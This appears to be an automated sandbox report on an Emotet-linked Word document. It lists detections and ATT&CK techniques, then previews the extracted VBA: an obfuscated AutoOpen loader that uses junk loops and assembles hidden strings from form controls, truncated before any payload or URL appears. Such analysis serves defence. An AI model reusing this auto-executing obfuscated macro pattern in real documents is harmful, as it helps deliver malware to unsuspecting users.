Verdict: MALICIOUS (Risk Score: 282)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros, specifically an AutoOpen macro, which is a common loader for Emotet. Heuristics indicate an obfuscated auto-exec loader that uses GetObject and execution sinks, consistent with Emotet's behavior. The ClamAV signature also confirms detection as Emotet. The VBA script's primary function appears to be downloading and executing a second-stage payload, although the exact download URL is obfuscated within the script.
Heuristics (8):
- ClamAV: Doc.Downloader.Emotet-10001946-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9079 bytes | 410ee80eb334a4c731b5d126b46c1f93aec566541f9acaa4ccdd74386890c17e |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "C41355"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "p479940, 0, 0, MSForms, TextBox"
Attribute VB_Control = "z_6296_6, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Q_9934, 2, 2, MSForms, TextBox"
Attribute VB_Control = "L586445, 3, 3, MSForms, TextBox"
Attribute VB_Control = "U3162544, 4, 4, MSForms, TextBox"
Attribute VB_Control = "N6111574, 5, 5, MSForms, TextBox"
Attribute VB_Name = "h5_876_"
Attribute VB_Name = "u977642"
Function j50187(P396241)
While E637531_ _
And _
z6883220
d7794043 = "K222412"
N69_340 = "F0528546"
Q6_9606 = "833382143"
P2_2553 = "813939108"
V557283 = "n90388_"
Wend
While J939_0 _
And _
w0_93_
B2058870 = "s25_3_"
l44336 = "Z5_30_8"
p268634 = "849633288"
E81819_3 = "563013670"
z5543309 = "X2759573"
Wend
Set j50187 = CVar(P396241)
While r2_29995 _
And _
Y0972_
K20625 = "S76758"
z426_6 = "q55_38_"
G9404173 = "627235485"
s48957 = "614544410"
G3985881 = "i7173_24"
Wend
While W3312_1 _
And _
O2715932
X1811_ = "O887361"
j943232 = "A37058"
j6822265 = "749785511"
j_2_33 = "521213248"
z40711_ = "T4_66075"
Wend
While L4669418 _
And _
j70500
i61663 = "v8286705"
Z38000_ = "a33070"
A08934 = "822617055"
c_81869 = "273596095"
i98272_ = "l9701596"
Wend
End Function
Sub _
_
_
autoopen()
On Error Resume Next
While A73890 _
And _
P5285__3
d520432 = "B9941630"
h13672_ = "B0592457"
P17515 = "994401364"
C23289 = "671879029"
w79594 = "i1718_58"
Wend
While M96158 _
And _
C613_900
P35_7808 = "l90837_9"
V48732 = "C4268791"
K02808 = "168230370"
S1492495 = "22061743"
j6308683 = "t2_877"
Wend
While B68171 _
And _
d5262_7
X4244934 = "U188217"
z16_8819 = "v752375"
l9683804 = "919772961"
Y75908_5 = "426907968"
C3959_ = "F969016"
Wend
L8942331
While C896457_ _
And _
H82967
E33592_ = "D786_514"
z976334_ = "d31776"
i077_56 = "381557287"
J3158_3 = "867820558"
E3635450 = "v63770"
Wend
While E21_961 _
And _
U642445
w2665521 = "n6808944"
S1_3_45 = "L9791042"
k08014_9 = "595952756"
z1926_3 = "262428734"
z95533 = "C579618"
Wend
While k267_02 _
And _
Y9581585
a2671343 = "t94577"
v4995_0 = "j2_0_323"
c55772 = "975880155"
Z126__64 = "962471819"
Z8348213 = "I244036"
Wend
End Sub
Attribute VB_Name = "F197993_"
Function L8942331()
On Error Resume Next
While i36869 _
And _
l_039449
M38537 = "Q377510"
Q361_249 = "B419470"
h4___3 = "456836531"
G69597 = "964266366"
H32576 = "A363_626"
Wend
While D806384 _
And _
X2_92326
w408222 = "c603265"
j3850672 = "T67_356"
D842_0 = "425744602"
w038940 = "842110806"
a511794 = "d7076352"
Wend
b94_1494 = C41355.N6111574 + C41355.z_6296_6 + C41355.N6111574 + C41355.Q_9934 + C41355.N6111574 + C41355.N6111574 + C41355.L586445 + C41355.N6111574 + C41355.N6111574 + C41355.U3162544 + C41355.N6111574 + C41355.p479940 + C41355.N6111574
While X6919_3 _
And _
i52517
z560019 = "t590782"
A0232128 = "b_7069"
r776113 = "48777659"
O19_64 = "583332642"
... (truncated)